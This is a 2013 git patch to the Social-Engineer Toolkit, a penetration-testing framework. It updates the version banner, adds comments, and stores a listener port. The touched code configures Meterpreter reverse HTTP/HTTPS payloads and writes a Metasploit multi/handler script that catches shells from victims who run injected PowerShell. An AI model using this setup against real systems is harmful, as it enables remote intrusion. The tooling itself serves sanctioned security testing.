From c54123b3644d18213e342244b992111a5dae7263 Mon Sep 17 00:00:00 2001 From: trustedsec Date: Thu, 21 Feb 2013 20:06:52 -0500 Subject: [PATCH] Removed additional prompt within powershell alphanum generator --- src/core/setcore.py | 6 +++--- src/payloads/powershell/prep.py | 8 ++++++++ src/powershell/powershell.py | 4 ++-- 3 files changed, 13 insertions(+), 5 deletions(-) diff --git a/src/core/setcore.py b/src/core/setcore.py index b24f1faa6..6a7fb1e05 100644 --- a/src/core/setcore.py +++ b/src/core/setcore.py @@ -223,7 +223,7 @@ def print_error(message): print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC def get_version(): - define_version = '4.4.5' + define_version = '4.7' return define_version class create_menu: @@ -842,8 +842,8 @@ def show_banner(define_version,graphic): print bcolors.BLUE + """ [---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---] [---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---] - [---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---] - [---] Codename: '""" + bcolors.YELLOW + """The Goat""" + bcolors.BLUE + """' [---] + [---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---] + [---] Codename: '""" + bcolors.YELLOW + """The Werewolf""" + bcolors.BLUE + """' [---] [---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---] [---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---] [---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---] diff --git a/src/payloads/powershell/prep.py b/src/payloads/powershell/prep.py index 95c4a53bc..7aacff247 100644 --- a/src/payloads/powershell/prep.py +++ b/src/payloads/powershell/prep.py @@ -18,6 +18,7 @@ else: powershell_inject_x64 = check_config("POWERSHELL_INJECT_PAYLOAD_X64=") powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=") +# if we specified a hostname then default to reverse https/http if validate_ip(ipaddr) == False: powershell_inject_x64 = "windows/meterpreter/reverse_https" powershell_inject_x86 = "windows/meterpreter/reverse_http" @@ -36,16 +37,23 @@ if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepat filewrite.write("\nuse exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, port)) filewrite.close() +# check to see if the meta config multi pyinjector is there if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)): if os.path.isfile("%s/src/program_junk/port.options" % (definepath)): fileopen = file("%s/src/program_junk/port.options" % (definepath), "r") port = fileopen.read() + # if port.options isnt there then prompt if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)): port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) if port == "": port = "443" + # write out port.options for later use + filewrite = file("%s/src/program_junk/port.options" % (definepath), "w") + filewrite.write(port) + filewrite.close() print_status("Generating x64-based powershell injection code...") +# define a base variable x64 = "" x86 = "" diff --git a/src/powershell/powershell.py b/src/powershell/powershell.py index 356a1771c..ca9216e23 100644 --- a/src/powershell/powershell.py +++ b/src/powershell/powershell.py @@ -53,10 +53,10 @@ if powershell_menu_choice != "99": if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)): port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) if port == "": port = "443" - + choice = yesno_prompt("0","Do you want to start the listener now [yes/no]: ") if choice == 'NO': - pass #print_status("To create the listener for Metasploit, run msfconsole -r powershell.rc") + pass # if we want to start the listener if choice == 'YES': victim = raw_input(setprompt(["29"], "Select x86 or x64 victim machine [default: x64]"))